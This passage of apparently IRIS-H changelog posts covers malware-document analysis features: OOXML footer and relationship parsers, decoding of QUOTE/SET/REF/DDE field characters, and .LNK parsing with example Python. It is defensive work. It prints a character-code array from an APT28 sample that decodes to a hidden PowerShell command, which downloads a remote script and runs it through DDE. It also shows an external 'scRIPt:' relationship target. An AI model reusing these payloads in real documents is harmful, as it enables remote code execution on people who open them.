<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Outstanding Tasks</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: None</span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"></span><b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;">Detailed Summary</b><br />
<b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;"><br /></b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">"Footer Part </span><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">contains the information about a footer displayed for one or more sections. Each Footer part is the target of an explicit relationship in the part-</span></span><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">relationship item for the Main Document. Each footer has a corresponding '<b>ftr</b>' element in a Footer part, which contains the text of the footer.</span></span><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">" </span><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">- </span><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">ECMA-376 Part 1 (section 11.3.6)</span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span>
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">A new parser for OOXML 'Footer Part' has been added to IRIS-H. The parser will detect and extract text content including special field characters. The extracted content can be found in a new panel under '<b>Individual Components</b>' section on the report page. See an example below:</span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFrcguC2UslgZJRpSu7izf_ICu-8U3JtkJasch6WdUeR17ESq1bcVwK4ra1OtJ3gGvU9U7oA9hke434EB9J7JJJJeRth2Wf806GhRtitFCWVgxNBOeAqGBQ_4VRU1BNLhrok2AmYjrV-Ln/s1600/footer_example.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="290" data-original-width="630" height="147" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFrcguC2UslgZJRpSu7izf_ICu-8U3JtkJasch6WdUeR17ESq1bcVwK4ra1OtJ3gGvU9U7oA9hke434EB9J7JJJJeRth2Wf806GhRtitFCWVgxNBOeAqGBQ_4VRU1BNLhrok2AmYjrV-Ln/s320/footer_example.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Example of a Footer Part panel showing extracted text content.</td></tr>
</tbody></table>
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span>
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">If the extracted content includes special field characters, they are checked for blacklisted field commands, and any matches are reported in the '<b>Malicious Findings</b>' panel on the report page. The corresponding findings panel is shown below:</span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg08ToJk5QbqQIKYnKzAm3l48DioI9SaVRbeyMklVo7oXwzVrEHYP2bEP0d2JO0JAKRa6QrFoMPPO4DnAHyTtcQY14tA35Ldy-BzXWUrftZJFj5yMjCCqxNS8xM686ZGxYO35bUCdb3HrRe/s1600/findings_example.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="316" data-original-width="623" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg08ToJk5QbqQIKYnKzAm3l48DioI9SaVRbeyMklVo7oXwzVrEHYP2bEP0d2JO0JAKRa6QrFoMPPO4DnAHyTtcQY14tA35Ldy-BzXWUrftZJFj5yMjCCqxNS8xM686ZGxYO35bUCdb3HrRe/s320/findings_example.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Corresponding findings panel showing detected field character type</td></tr>
</tbody></table>
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span>
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">Full report for the example above can be found here - </span><a href="https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e" rel="nofollow" style="font-family: "trebuchet ms", trebuchet, sans-serif;" target="_blank">https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e</a><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span>Denis O'Brienhttp://www.blogger.com/profile/07233679823730420087noreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-33297338099441016562017-11-09T22:09:00.000+00:002017-11-09T22:10:05.774+00:00IRIS-H (alpha): Added OOXML Relationships file parser<b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;">Quick Summary</b><br />
<b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;"><br /></b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"></span><b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Build Version</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: 0.0.1(alpha)</span><br />
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Change Type</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: new feature</span><br />
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Affected Components</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: API & UI (clear browser cache to see the changes)</span><br />
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Short Description</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: Parser for OOXML "Relationships" file has been added. The parser detects and extracts hyperlinks to external sources.</span><br />
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Outstanding Tasks</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: None</span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"></span><b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;">Detailed Summary</b><br />
<b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;"><br /></b>
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">"Relationships are represented in XML in a Relationships part. Each part in the package that is the source of one </span></span><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">or more relationships can have an associated Relationships part. This part holds the list of relationships for the </span><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">source part." - </span><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">ECMA-376 Part 2 (section 9.3.3)</span></span><br />
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;"><br /></span></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhraPHTHmQmlISc0u11tSGr8T9vflxdw9M0NygbKG6ogxwKfE56VWlf5J4w_cvEX_Tm1p6mqsqHG4JfnLztAHgaDcI0y5EDLczuXZm1bYl4j7ETJH-eWqK3M0yAdMhPTVhycHDKbYFo7gVD/s1600/rels_example.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="149" data-original-width="1246" height="38" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhraPHTHmQmlISc0u11tSGr8T9vflxdw9M0NygbKG6ogxwKfE56VWlf5J4w_cvEX_Tm1p6mqsqHG4JfnLztAHgaDcI0y5EDLczuXZm1bYl4j7ETJH-eWqK3M0yAdMhPTVhycHDKbYFo7gVD/s320/rels_example.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Relationships file example</td></tr>
</tbody></table>
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">A new parser for the OOXML Relationships file has been added to IRIS-H. The parser reads every Relationship in the Relationships file and extracts hyperlinks that point at external sources (relationships with TargetMode="External"). Below is an example of a Relationship that will be detected:</span></span><br />
<blockquote class="tr_bq">
<code>&lt;Relationship Id="_id_1633" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" TargetMode="External" Target="scRIPt:https://filetea.me/n3wBS7q8XNvRjiEwg8ZL2bXhw/dl" /&gt;</code></blockquote>
<br />
The extracted hyperlinks are displayed under the "Suspicious Findings" panel. See below for an example:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrqiFb9guyI56J6Zd388nyfL5d_eHBtxmAE1LVmxu93PQaRH8mmsRCKbR_T__04BjBC6p9siD4GYoUNwEnJJX3MxQy-MyOwVC1bgLgoP9suGnbUgVQczHITllOxsvFEPGsROlzd5CDhsIa/s1600/findings.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="258" data-original-width="627" height="131" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrqiFb9guyI56J6Zd388nyfL5d_eHBtxmAE1LVmxu93PQaRH8mmsRCKbR_T__04BjBC6p9siD4GYoUNwEnJJX3MxQy-MyOwVC1bgLgoP9suGnbUgVQczHITllOxsvFEPGsROlzd5CDhsIa/s320/findings.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">"Suspicious Findings" example showing detected hyperlinks</td></tr>
</tbody></table>
<br />
The full report for the example above can be found here - <a href="https://iris-h.malwageddon.com/report/7b133ac4016aab06fff2c24e5d9e9e97" rel="nofollow" target="_blank">https://iris-h.malwageddon.com/report/7b133ac4016aab06fff2c24e5d9e9e97</a><br />
<br />
<u><b>NOTE</b></u><br />
IRIS-H UI changes might require you to clear your browser cache for the iris-h.malwageddon.com website before they take effect.<br />
<br />
<br />
<br />Denis O'Brien (http://www.blogger.com/profile/07233679823730420087)<br />
<br />
<b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;">IRIS-H (alpha): Updated Field Characters Parser</b><br />
Published 2017-11-08T00:19:00.002+00:00, updated 2017-11-09T21:36:08.616+00:00<br />
<br />
<b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;">Quick Summary</b><br />
<b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;"><br /></b>
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Build Version</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: 0.0.1(alpha)</span><br />
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Change Type</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: feature improvement</span><br />
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Affected Components</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: API</span><br />
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Short Description</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: Parser for Field Characters used in OLE and OOXML documents has been updated to improve detection. QUOTE, SET, REF field characters have been added to the reporting.</span><br />
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Outstanding Tasks</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: None</span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span>
<b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;">Detailed Summary</b><br />
<b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;"><br /></b>
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="background-color: white;">Field Character extraction and parsing code has been improved to allow for decoding QUOTE command arguments. The change was motivated by McAfee's blog <a href="https://securingtomorrow.mcafee.com/mcafee-labs/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign/#sf151634298" rel="nofollow" target="_blank">post</a> today referencing OOXML document used in an APT type of attack. Document's XML code snippet below show an example of what field characters are used and how they are present in the code.</span></span><br />
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQvP2TwHMu5HpUcVo9D3OHdfieSSaJQ0LcZIzOxShANU9dO423DFfzY5SIS8Mo7r8JwAD8guTdL1Xr_OC8UAX5xxk03fZ_de5p-jn79wzWok_ytZ68MckrclS0OIT3l7AZMnp3cFEww2DG/s1600/quote.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="497" data-original-width="745" height="213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQvP2TwHMu5HpUcVo9D3OHdfieSSaJQ0LcZIzOxShANU9dO423DFfzY5SIS8Mo7r8JwAD8guTdL1Xr_OC8UAX5xxk03fZ_de5p-jn79wzWok_ytZ68MckrclS0OIT3l7AZMnp3cFEww2DG/s320/quote.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">QUOTE field character usage example</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGtE5DCiZazmZoc-TQbnoWay7aNW4XZAkSRMPyUIabQvgvZE8rfn0JB3hwjsvZziTH6Ntas61vr3XaDby9geSAwpkvrjmqFX-1qWI8TbsX1recKs675OxH-LirXNsPFoDrnEDaHdRa3zYJ/s1600/dde.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="844" data-original-width="420" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGtE5DCiZazmZoc-TQbnoWay7aNW4XZAkSRMPyUIabQvgvZE8rfn0JB3hwjsvZziTH6Ntas61vr3XaDby9geSAwpkvrjmqFX-1qWI8TbsX1recKs675OxH-LirXNsPFoDrnEDaHdRa3zYJ/s320/dde.PNG" width="159" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">DDE field character and the way its arguments are assembled</td></tr>
</tbody></table>
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="background-color: white;">Unlike previous instances of DDE and DDEAUTO field character usage in malicious documents, this document doesn't expose the command arguments that normally contain indicators of compromise. Instead, a combination of other field characters is used to store and assemble the command arguments.</span></span><br />
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="background-color: white;">SET command is used to store the value produced by QUOTE command and later passed to DDE command through REF field character. Below is an example of that:</span></span><br />
<blockquote class="tr_bq">
SET c QUOTE 67 58 92 80 114 111 103 114 97 109 115 92 77 105 99 114 111 115 111 102 116 92 79 102 102 105 99 101 92 77 83 87 111 114 100 46 101 120 101 92 46 46 92 46 46 92 46 46 92 46 46 92 87 105 110 100 111 119 115 92 83 121 115 116 101 109 51 50 92 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 92 118 49 46 48 92 112 111 119 101 114 115 104 101 108 108 46 101 120 101 32 45 78 111 80 32 45 115 116 97 32 45 78 111 110 73 32 45 87 32 72 105 100 100 101 110 32 36 101 61 40 78 101 119 45 79 98 106 101 99 116 32 83 121 115 116 101 109 46 78 101 116 46 87 101 98 67 108 105 101 110 116 41 46 68 111 119 110 108 111 97 100 83 116 114 105 110 103 40 39 104 116 116 112 58 47 47 110 101 116 109 101 100 105 97 114 101 115 111 117 114 99 101 115 46 99 111 109 47 99 111 110 102 105 103 46 116 120 116 39 41 59 112 111 119 101 114 115 104 101 108 108 32 45 101 110 99 32 36 101 32 35 </blockquote>
The 'c' variable now holds the output of the QUOTE command (a character string built from the array of character codes). Later, 'c' is referenced in the DDE command call as one of its arguments.<br />
<blockquote class="tr_bq">
DDE REF c </blockquote>
When the DDE command is called, the value of the 'c' variable is used as its argument.<br />
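To show how the SET/QUOTE/REF indirection above resolves, here is an added Python example (my own code, not IRIS-H's field character handlers) that replays the field codes: it decodes QUOTE's character-code array into a string, stores it under the SET name, and substitutes REF references in the DDE field so the real arguments become visible. The field instructions are constructed and spell a harmless string.

```python
import re

# Constructed field-code instructions in the shape discussed above: SET + QUOTE
# build a string, DDE + REF consume it. The codes spell a harmless string and
# are not taken from any real sample.
SAMPLE_FIELDS = [
    "SET c QUOTE 72 101 108 108 111 44 32 119 111 114 108 100",
    "DDE REF c",
]

SET_QUOTE_RE = re.compile(r"^\s*SET\s+(\S+)\s+QUOTE\s+((?:\d+\s*)+)$", re.IGNORECASE)
REF_RE = re.compile(r"\bREF\s+(\S+)", re.IGNORECASE)


def decode_quote(codes):
    """QUOTE turns each numeric argument into the character with that code."""
    return "".join(chr(int(n)) for n in codes.split())


def evaluate_fields(instructions):
    """Replay SET/QUOTE assignments, then resolve REF <name> in the remaining fields.

    Returns (variables, resolved_fields). An unknown REF name is left untouched so
    the analyst can see that a definition was missed rather than silently dropped.
    """
    variables = {}
    resolved = []
    for instr in instructions:
        match = SET_QUOTE_RE.match(instr)
        if match:
            variables[match.group(1)] = decode_quote(match.group(2))
            continue
        resolved.append(REF_RE.sub(
            lambda m: variables.get(m.group(1), m.group(0)), instr))
    return variables, resolved


def resolved_dde_commands(instructions):
    """Argument string of every DDE/DDEAUTO field once REF indirection is resolved."""
    _, resolved = evaluate_fields(instructions)
    commands = []
    for field in resolved:
        parts = field.split(None, 1)
        if parts and parts[0].upper() in ("DDE", "DDEAUTO"):
            commands.append(parts[1] if len(parts) > 1 else "")
    return commands
```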
<br />
IRIS-H field character handlers have been updated to extract the character codes array associated with the QUOTE command and decode it. If extraction and decoding are successful, the report page will contain output similar to the one below.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiABU77Ww7ZC8p94Gdoo5egxuOAGo4xmxr478hitzt587dkp9xjf0DQZvz8o-bicPcFLDkGGyDLbAhLyoHrQ8BYd3QYOzliT6H7mljvoNhe36eyXGTLvLMZ5bHWfc3gPDXvs8RH35lDns3R/s1600/new_detection.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="379" data-original-width="753" height="161" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiABU77Ww7ZC8p94Gdoo5egxuOAGo4xmxr478hitzt587dkp9xjf0DQZvz8o-bicPcFLDkGGyDLbAhLyoHrQ8BYd3QYOzliT6H7mljvoNhe36eyXGTLvLMZ5bHWfc3gPDXvs8RH35lDns3R/s320/new_detection.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Example of QUOTE command evaluation</td></tr>
</tbody></table>
This method of using field characters presents new challenges, especially around reconstructing the original text in the same sequence as it appears in the document when it is opened with its corresponding host application. IRIS-H will still attempt to extract all the text fields, but the original text appearance sequence cannot be guaranteed.<br />
<br />
The full report can be found here - <a href="https://iris-h.malwageddon.com/report/e0b8c953e3e6c3f133d1d9301e8eb15a" rel="nofollow" target="_blank">https://iris-h.malwageddon.com/report/e0b8c953e3e6c3f133d1d9301e8eb15a</a><br />
<br />Denis O'Brien (http://www.blogger.com/profile/07233679823730420087)<br />
<br />
<span style="color: #3d85c6; font-size: x-large;"><b>IRIS-H (alpha): Added support for Shell Link (.LNK) files</b></span><br />
Published 2017-11-07T00:22:00.000+00:00, updated 2017-11-07T00:22:01.353+00:00<br />
<br />
<span style="color: #3d85c6; font-size: x-large;"><b>Quick Summary</b></span><br />
<b><br /></b>
<b>Build Version</b>: 0.0.1(alpha)<br />
<b>Change Type</b>: new feature<br />
<b>Affected Components</b>: API & UI<br />
<b>Short Description</b>: A Shell Link (.LNK) file format parser has been added to the API component. Cosmetic changes were made to the UI to align the new data view with the existing format.<br />
<b>Outstanding Tasks</b>: Implement support for missing Extra Data Blocks<br />
<br />
<span style="color: #3d85c6; font-size: x-large;"><b>Detailed Summary</b></span><br />
<div>
<br />
A new binary data parser has been added to the IRIS-H service. It handles processing and extracting digital artifacts from Shell Link (.LNK) files. The service now accepts LNK files through the Submission page and can also automatically detect them embedded in submitted documents. In either case, the report page displays the extracted binary data enriched with a human-readable description. The enrichment process references the official Microsoft specification for the <a href="https://msdn.microsoft.com/en-us/library/dd871305.aspx" rel="nofollow" target="_blank">[MS-SHLLINK]</a> Binary File Format.<br />
<br />
The parser fully supports the following LNK file structures:<br />
<br />
<ul>
<li>ShellLinkHeader</li>
<li>LinkTargetIDList</li>
<li>LinkInfo</li>
<li>StringData</li>
</ul>
<div>
The ExtraData structure is only partially supported at this time. Only the following Data Blocks are processed:</div>
<div>
<ul>
<li>EnvironmentVariableDataBlock</li>
<li>KnownFolderDataBlock</li>
<li>SpecialFolderDataBlock</li>
<li>TrackerDataBlock</li>
<li>PropertyStoreDataBlock</li>
</ul>
<div>
Once all binary data is extracted, it is subjected to a rule-based evaluation, which concludes whether the submitted or embedded LNK file can be harmful. IRIS-H also attempts to reconstruct the command line, including its arguments if any. Below is an example of rule-based evaluation results.</div>
</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCCx9PosSlnGAbT2UdLrO7338Gd6CDLFZTHsM8jBTU6oQ5_pVcH4zEF9YqbVjs2zpTrE-cFwfxzEjZJLthq7Idg8rhB9oJ-kxjNITLgRZnfFyH8LegaIMuVvFoeUEWfUEj0qstcoBqfVNP/s1600/mal_findings.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="258" data-original-width="728" height="113" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCCx9PosSlnGAbT2UdLrO7338Gd6CDLFZTHsM8jBTU6oQ5_pVcH4zEF9YqbVjs2zpTrE-cFwfxzEjZJLthq7Idg8rhB9oJ-kxjNITLgRZnfFyH8LegaIMuVvFoeUEWfUEj0qstcoBqfVNP/s320/mal_findings.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">LNK file rule-based evaluation results</td></tr>
</tbody></table>
<div>
A few new sections have been added to the "Informational Findings" panel. The sections display information relevant to the LNK file target: file path, working directory, relative path, command-line arguments, etc. One particular section, "Link Target Tracking", contains the evaluation results of the data stored in the following Data Blocks:</div>
<div>
<ul>
<li>Droid Volume Identifier</li>
<li>Droid File Identifier</li>
<li>Birth Droid Volume Identifier</li>
<li>Birth Droid File Identifier</li>
</ul>
Based on this data, IRIS-H tries to identify whether the link target file was moved between volumes on the original computer or moved to another machine. For more information, see page 10 of this <a href="http://computerforensics.parsonage.co.uk/downloads/TheMeaningofLIFE.pdf" rel="nofollow" target="_blank">PDF</a>. Below is an example of the "Informational Findings" view.</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTcf4tP9ZxvOK3TCM_iS0i2lSZXK8JPCP3ZL7gTkneQ8a23xAZBuYDsev6qZShtWnXWpwNvehKwKl7hQ8GT9vniPWZ45F3onnGn7x9Eb2Wl5_ZfROeYh29j-vriCK7gPoIQpckjxJ0Coo1/s1600/inf_findings.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="236" data-original-width="735" height="102" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTcf4tP9ZxvOK3TCM_iS0i2lSZXK8JPCP3ZL7gTkneQ8a23xAZBuYDsev6qZShtWnXWpwNvehKwKl7hQ8GT9vniPWZ45F3onnGn7x9Eb2Wl5_ZfROeYh29j-vriCK7gPoIQpckjxJ0Coo1/s320/inf_findings.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">LNK file Informational Findings example</td></tr>
</tbody></table>
<div>
"Detailed Components Breakdown" section of the report contains all the data IRIS-H could extract from an LNK file. I was personally surprised to find out how much those little files actually contain. For example, TrackerDataBlock holds the Link Target originator machine's NetBIOS name and MAC address. See below for an example.</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgX_23coych3qeNapJKIllG9iAmH-LkfcN0H1mHjrsgbjkrtcGuX2wBPEjEoSRS90iDkSTgLzLLtWd_di0Aau6xXUuRWviC26wZF059gWCAfoF_NXYqVjOQIljaNPWgZZKH3tX6B8bwQVZ8/s1600/trackerDataBlock.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="417" data-original-width="732" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgX_23coych3qeNapJKIllG9iAmH-LkfcN0H1mHjrsgbjkrtcGuX2wBPEjEoSRS90iDkSTgLzLLtWd_di0Aau6xXUuRWviC26wZF059gWCAfoF_NXYqVjOQIljaNPWgZZKH3tX6B8bwQVZ8/s320/trackerDataBlock.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Data derived from TrackerDataBlock</td></tr>
</tbody></table>
<div>
</div>
<br />
The ShellLinkHeader section contains timestamps associated with the Link Target, as well as its file attributes, the type of media it resides on (hard disk, USB, network, etc.), the media serial number and even the command-line window state. See below for an example.</div>
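As an added example covering the ShellLinkHeader fields just described and the StringData/command-line reconstruction mentioned earlier (my own code, not IRIS-H's parser), the Python below assembles a small constructed .LNK following the [MS-SHLLINK] layout, parses the header flags, attributes, FILETIME stamps and ShowCommand, then reads the StringData entries. The evaluation notes are illustrative heuristics, and the cp1252 fallback for non-Unicode strings is an assumption.

```python
import struct
from datetime import datetime, timedelta, timezone

# Layout and constants from [MS-SHLLINK] section 2.1; the flag tables are a subset.
HEADER_FMT = "<I16sIIQQQIiIHHII"   # HeaderSize..Reserved3, 76 bytes, little-endian
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
LINK_FLAGS = {
    0x01: "HasLinkTargetIDList", 0x02: "HasLinkInfo", 0x04: "HasName",
    0x08: "HasRelativePath", 0x10: "HasWorkingDir", 0x20: "HasArguments",
    0x40: "HasIconLocation", 0x80: "IsUnicode", 0x100: "ForceNoLinkInfo",
    0x200: "HasExpString", 0x400: "RunInSeparateProcess", 0x2000: "RunAsUser",
}
FILE_ATTRIBUTES = {0x01: "READONLY", 0x02: "HIDDEN", 0x04: "SYSTEM",
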